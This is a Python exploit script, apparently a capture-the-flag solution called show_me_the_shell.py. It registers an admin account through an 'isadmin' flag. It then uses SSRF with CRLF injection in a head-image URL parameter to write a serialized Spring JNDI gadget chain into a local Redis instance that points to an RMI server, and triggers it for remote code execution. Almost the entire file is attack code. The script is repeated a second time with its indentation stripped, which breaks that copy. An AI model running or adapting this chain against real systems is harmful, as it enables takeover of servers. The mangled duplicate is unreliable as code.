Tom4t0/show_me_the_shell.py

## show_me_the_shell.py
import requests
def register(url):
	reg_url = url + '/doregister.do'
	post_data = {'username':'admin','password':'admin123','repassword':'admin123','isadmin':'1'}
	resp = requests.post(url=reg_url,data=post_data)


def login(url):
	req = requests.Session()
	login_url = url + '/login.do'
	post_data = {'username':'admin','password':'admin123'}
	response = req.post(url=login_url,data=post_data,allow_redirects=False)
	cookie_value = response.headers['Set-Cookie']
	last_cookie = cookie_value.split(';')[0].split('=')[1]
	return last_cookie

def exploit(url,cookie_value):
	headers = {'Cookie':'JSESSIONID={cookie_value}'.format(cookie_value=cookie_value)}
	step1 = {"url":"http://127.0.0.1\r\n\r\nset post27 \"\\x01\\x00java.util.HashMa\\xf0\\x01\\x02\\x01\\x01\\xc2\\x01org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor\\x01\\x01rmi\"\r\n\r\n:6379/1.jpg"}
	step2 = {"url":"http://127.0.0.1\r\n\r\neval \"return redis.call('append','post27',string.char(0x3a,0x2f,0x2f))\" 0\r\n\r\n:6379/1.jpg"}
	step3 = {"url":"http://127.0.0.1\r\n\r\nappend post27 rmiserver\r\n\r\n:6379/1.jpg"}
	step4 = {"url":"http://127.0.0.1\r\n\r\neval \"return redis.call('append','post27',string.char(0x2f))\" 0\r\n\r\n:6379/1.jpg"}
	step5 = {"url":"http://127.0.0.1\r\n\r\nappend post27 \"Objec\\xf4\\x01\\x02org.springframework.jndi.support.SimpleJndiBeanFactor\\xf9\\x01\\x01\\x03org.springframework.jndi.JndiTemplat\\xe5\\x01\\x00\\x01\\x04org.apache.commons.logging.impl.NoOpLo\\xe7\\x01\\x01\\x04\\x01\\x01\\x01\\x00\\x01\\x00\\x01\\x05java.util.HashSe\\xf4\\x01\\x01\\x03\\x04\\x01\\x00\\x01\\x00\\x00\\x01\\x06org.springframework.aop.TruePointcu\\xf4\\x01\\x01\\x01\\x03\\x01\\x01\\x01\\x00\\x00\\x00\\x01\\x06\\x0c\\x01\\x01\\n\"\r\n\r\n:6379/1.jpg"}
	steplist = [step1,step2,step3,step4,step5]
	for step in steplist:
		exploit_url = url + '/user/headimg.do'
		resp = requests.get(url=exploit_url,headers=headers,params=step)
	resp = requests.get(url=url+'/manage/check.do?pid=27',headers=headers)

if __name__ == '__main__':
	url = 'http://192.168.201.25'
	register(url)
	cookie=login(url)
	exploit(url,cookie)
	import requests
	def register(url):
	reg_url = url + '/doregister.do'
	post_data = {'username':'admin','password':'admin123','repassword':'admin123','isadmin':'1'}
	resp = requests.post(url=reg_url,data=post_data)


	def login(url):
	req = requests.Session()
	login_url = url + '/login.do'
	post_data = {'username':'admin','password':'admin123'}
	response = req.post(url=login_url,data=post_data,allow_redirects=False)
	cookie_value = response.headers['Set-Cookie']
	last_cookie = cookie_value.split(';')[0].split('=')[1]
	return last_cookie

	def exploit(url,cookie_value):
	headers = {'Cookie':'JSESSIONID={cookie_value}'.format(cookie_value=cookie_value)}
	step1 = {"url":"http://127.0.0.1\r\n\r\nset post27 \"\\x01\\x00java.util.HashMa\\xf0\\x01\\x02\\x01\\x01\\xc2\\x01org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor\\x01\\x01rmi\"\r\n\r\n:6379/1.jpg"}
	step2 = {"url":"http://127.0.0.1\r\n\r\neval \"return redis.call('append','post27',string.char(0x3a,0x2f,0x2f))\" 0\r\n\r\n:6379/1.jpg"}
	step3 = {"url":"http://127.0.0.1\r\n\r\nappend post27 rmiserver\r\n\r\n:6379/1.jpg"}
	step4 = {"url":"http://127.0.0.1\r\n\r\neval \"return redis.call('append','post27',string.char(0x2f))\" 0\r\n\r\n:6379/1.jpg"}
	step5 = {"url":"http://127.0.0.1\r\n\r\nappend post27 \"Objec\\xf4\\x01\\x02org.springframework.jndi.support.SimpleJndiBeanFactor\\xf9\\x01\\x01\\x03org.springframework.jndi.JndiTemplat\\xe5\\x01\\x00\\x01\\x04org.apache.commons.logging.impl.NoOpLo\\xe7\\x01\\x01\\x04\\x01\\x01\\x01\\x00\\x01\\x00\\x01\\x05java.util.HashSe\\xf4\\x01\\x01\\x03\\x04\\x01\\x00\\x01\\x00\\x00\\x01\\x06org.springframework.aop.TruePointcu\\xf4\\x01\\x01\\x01\\x03\\x01\\x01\\x01\\x00\\x00\\x00\\x01\\x06\\x0c\\x01\\x01\\n\"\r\n\r\n:6379/1.jpg"}
	steplist = [step1,step2,step3,step4,step5]
	for step in steplist:
	exploit_url = url + '/user/headimg.do'
	resp = requests.get(url=exploit_url,headers=headers,params=step)
	resp = requests.get(url=url+'/manage/check.do?pid=27',headers=headers)

	if __name__ == '__main__':
	url = 'http://192.168.201.25'
	register(url)
	cookie=login(url)
	exploit(url,cookie)